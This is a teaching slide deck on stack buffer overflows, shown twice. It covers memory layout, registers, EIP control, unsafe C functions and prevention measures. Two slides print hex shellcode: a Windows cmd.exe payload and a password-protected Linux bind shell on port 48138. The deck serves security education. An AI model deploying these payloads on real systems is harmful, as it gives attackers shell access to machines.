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          Buffer Overflows by: Saurabh Sharma
Buffer: The memory area where the user input is stored.Overflow: The user input exceeds the maximum size of the buffer, overwriting the other areas of the memory and corrupting those areas.Anatomy of Buffer Overflows
void get_input() {    char buf[1024];    gets(buf);}void main(intargc, char*argv[]){get_input();}User controls the input. Malicious user can supply the input of more than 500 chars. So what ??User can supply a malicious input which can execute some  other exe. This can also be your cmd.exe and may lead to the system compromise.A small example
Text: Contains instructionsData: Contains initialized variablesBSS: Contains uninitialized global and static variables(initialized to 0)Heap: Contains dynamic, uninitialized data(malloc())Stack: Contains function arguments and local variablesMemory overview
Stack Frame:holds variables and data for functionStack grows from higher memory location to lower memory locationHeap: lower to higherMemory overview
General purpose: For basic calculations.ESI, EDI: Used mostly with arraysFlags: Outcome of several instructions set the flagsSegment: Code, stack, data.EBP:Base pointer, points to the beginning of the current stack frameESP: Stack pointer, points to the top of the stackEIP: Instruction pointer, points to the next instructionREGISTERS
Stack is a LIFO data structure. Temporary memory, formed when the function called.A new stack frame created when the function is called.The return address is saved just above the local variables.Stack LayoutLower addressparametersReturn addr(saved EIP)Saved EBPStack growsLocal variablesHigher address
So, if the EIP can be controlled, the next instruction to be executed can be controlled.Stack LayoutLower addressparametersReturn addr(saved EIP)Saved EBPStack growsLocal variablesHigher address
Machine code which is injected into the overflown bufferDoes the work for youWORK: executing a third program, adding an administrator etc.SHELLCODE
win32/xp sp2 (En) cmd.exe 23 bytes Author : MountassifMoad A.K.A : "8bec68657865" "2068636d642e" "8d45f850b88D" "15867Cffd0"; EXAMPLE SHELLCODES(SMALL)
BY NRAZIZ * * */ /* * Binds to port 48138 * Password: haxor */ char bindcode[]="31db5343536a0289e1b066cd80" "31d2526668bc0a666a0289e26a" "10526a0389e1fec3b066cd806a" "026a0389e1b304b066cd8031c9" "51516a0389e1fec3b066cd8031" "db536a3a685061737389e66a05" "566a0489e1b309b066cd8031c9" "31f6516a05526a0489e1b30ab0" "66cd8031c9516a72686861786f" "89e789d680c105fcf3a675bf31" "c9b304b03fcd804183f90375f6" "31c050682f2f7368682f62696e" "89e3505389e131d2b00bcd80b0" "01cd80"EXAMPLE SHELLCODES(bigger)
strcpy() strcat() sprintf() scanf() sscanf() fscanf() vfscanf() vsprintfvscanf() vsscanf() streadd() strecpy() strtrns() MAJOR SNARES
Buffer size must be checkedUse alternative functions e.g. strncpy(dst, src, dst_size-1) instead of strcpy(dst, src)Other protection mechanisms like /GS(stack cookie), ASLR, SafeSEH compilationPREVENTION

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Buffer Overflow Demo by Saurabh Sharma

  • 1. Buffer Overflows by: Saurabh Sharma
  • 2. BUFFER
  • 3. Buffer: The memory area where the user input is stored.Overflow: The user input exceeds the maximum size of the buffer, overwriting the other areas of the memory and corrupting those areas.Anatomy of Buffer Overflows
  • 4. void get_input() { char buf[1024]; gets(buf);}void main(intargc, char*argv[]){get_input();}User controls the input. Malicious user can supply the input of more than 500 chars. So what ??User can supply a malicious input which can execute some other exe. This can also be your cmd.exe and may lead to the system compromise.A small example
  • 5. Text: Contains instructionsData: Contains initialized variablesBSS: Contains uninitialized global and static variables(initialized to 0)Heap: Contains dynamic, uninitialized data(malloc())Stack: Contains function arguments and local variablesMemory overview
  • 6. Stack Frame:holds variables and data for functionStack grows from higher memory location to lower memory locationHeap: lower to higherMemory overview
  • 7. General purpose: For basic calculations.ESI, EDI: Used mostly with arraysFlags: Outcome of several instructions set the flagsSegment: Code, stack, data.EBP:Base pointer, points to the beginning of the current stack frameESP: Stack pointer, points to the top of the stackEIP: Instruction pointer, points to the next instructionREGISTERS
  • 8. Stack is a LIFO data structure. Temporary memory, formed when the function called.A new stack frame created when the function is called.The return address is saved just above the local variables.Stack LayoutLower addressparametersReturn addr(saved EIP)Saved EBPStack growsLocal variablesHigher address
  • 9. So, if the EIP can be controlled, the next instruction to be executed can be controlled.Stack LayoutLower addressparametersReturn addr(saved EIP)Saved EBPStack growsLocal variablesHigher address
  • 10. Machine code which is injected into the overflown bufferDoes the work for youWORK: executing a third program, adding an administrator etc.SHELLCODE
  • 11. win32/xp sp2 (En) cmd.exe 23 bytes Author : MountassifMoad A.K.A : "8bec68657865" "2068636d642e" "8d45f850b88D" "15867Cffd0"; EXAMPLE SHELLCODES(SMALL)
  • 12. BY NRAZIZ * * */ /* * Binds to port 48138 * Password: haxor */ char bindcode[]="31db5343536a0289e1b066cd80" "31d2526668bc0a666a0289e26a" "10526a0389e1fec3b066cd806a" "026a0389e1b304b066cd8031c9" "51516a0389e1fec3b066cd8031" "db536a3a685061737389e66a05" "566a0489e1b309b066cd8031c9" "31f6516a05526a0489e1b30ab0" "66cd8031c9516a72686861786f" "89e789d680c105fcf3a675bf31" "c9b304b03fcd804183f90375f6" "31c050682f2f7368682f62696e" "89e3505389e131d2b00bcd80b0" "01cd80"EXAMPLE SHELLCODES(bigger)
  • 13. DEMO
  • 14. strcpy() strcat() sprintf() scanf() sscanf() fscanf() vfscanf() vsprintfvscanf() vsscanf() streadd() strecpy() strtrns() MAJOR SNARES
  • 15. Buffer size must be checkedUse alternative functions e.g. strncpy(dst, src, dst_size-1) instead of strcpy(dst, src)Other protection mechanisms like /GS(stack cookie), ASLR, SafeSEH compilationPREVENTION
  • 17. ?????????????????QUESTIONS